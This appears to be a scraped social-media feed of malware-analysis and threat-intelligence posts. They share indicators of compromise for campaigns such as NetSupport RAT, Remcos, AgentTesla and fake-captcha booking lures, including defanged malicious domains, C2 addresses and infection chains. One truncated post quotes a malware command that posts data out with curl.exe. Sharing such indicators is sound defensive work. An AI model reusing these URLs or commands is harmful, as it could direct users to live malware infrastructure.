[1/n] In the hope that it might be useful to someone, I am happy to share with the community my basic (and cheap) implementation of a @CapeSandbox in physical machine config, integrating Elastic Stack and Elastic agents, Suricata, Aurora-Lite agent and Sysmon. #malwareanalysis

RT @JAMESWT_WT: #netsupport #rat .GatewayAddress=summer25hot.]org:443.88.218.93[.]71. Main Sample from @abuse_ch .👇👇👇..

RT @Sh4dow3x3: 🚨 #PhishingAlert #banktrojan : @credem userbase targeted to download an apk.🔗 https[:]//certifica-lt[.]com/io/.📦 Certificat….

RT @JAMESWT_WT: "Ordine 191/15".Xls>Hta>Ps1>Stego. (pentactine.bat chilitis.vbs ). Samples + extra👇. Iocs +extra.ht….

RT @JAMESWT_WT: "RE: TOURS BOOKING".#booking spam email spread .#RemCosRat .⛔️C2 178.215.236.]251:2727.#AgentTesla.⛔️ExFil Smtp > sendxambr….

RT @abuse_ch: There's a #MassLogger malware campaign using an allegedly compromised email account🪝of an employee at the Ministry of Agricul….

RT @JAMESWT_WT: Some Mentioned #KimJongRAT Samples👇. Nice Relation from 2024.for Second Stage Loader Files (baby.dl….

RT @JAMESWT_WT: #FakeCaptcha #booking .👇.ferramentarontini.]com/booking/?93698625 .👇.bookpartcen.]com.👇.capforbein.]com.👇.humacep.]com.info….

RT @skocherhan: "POSTA CERTIFICATA: ?????? ??????????? ??????????? - ??????????".(Wed, 4 Jun 2025).From:"Per conto di: michele[.]cursio@pec….

RT @JAMESWT_WT: "Inquiry via MLPT".attachment + link www.sendspace.]com/file/oq147o.👇. cc @cocaman .

RT @AgidCert: 🇮🇹 Campagna #Remcos tramite #Modiloader. 🎯 Italia. ⚔️ TTP: ZIP > JS > PIF. 🦠 #IoC👇 . 🔗 (Telegram) ht….

RT @JAMESWT_WT: "#Zoom meeting invitation".👇.#ConnectWise #ScreenConnect.👇.⛔️ https://ipfs.]io/ipfs/bafkreidhjjclhv3s6lda34tfr3zj4ymr7xptzhd….

RT @JAMESWT_WT: Related Samples👇. ⛔️👇.perpetualleadsformula[.]com.channelchief.varindia[.]com.channelchief.varindia….

RT @JAMESWT_WT: "Ordine cliente ORC-712" #italy . Samples👇.

#phishing subito.[it .@JAMESWT_WT @guelfoweb @csirt_it @AndreaDraghetti.

RT @JAMESWT_WT: #booking #fakecatpcha .> Dll sideloading via Java SE .👇.view-reservation-0848833.]com.👇PwrSh.bktfvaq.]com/huscaq .👇Zip.arca….

RT @JAMESWT_WT: #booking #fakecaptcha.@Google 👇.script.]google.]com/macros/s/AKfycbyZAK2Gp2FZYyUtaKt1CeoAPwWPFdcBzvq72UAFMRrKq8oz04Xw9FviH3….

RT @JAMESWT_WT: @1ZRR4H 👇.👇.sablayan.seasonshotelmindoro.]com/wp-content/uploads/2025/05/.imagens.txt.1invoke.txt.1….

RT @RacWatchin8872: 🚨After a long time, I finally created a GitHub repo containing the domains discovered by the bot:. .

RT @JAMESWT_WT: Related #Fake #BitDefender Samples👇. @Bitdefender 👇.⛔️ https://bitdefender-download.]com/downloads/B….

RT @JAMESWT_WT: 👇.cahasdxca123.]com/lander/jdfcxn/.pass. py.exts. py.script.enc.👇."C:\WINDOWS\system32\curl.exe" -X POST https://domainserv….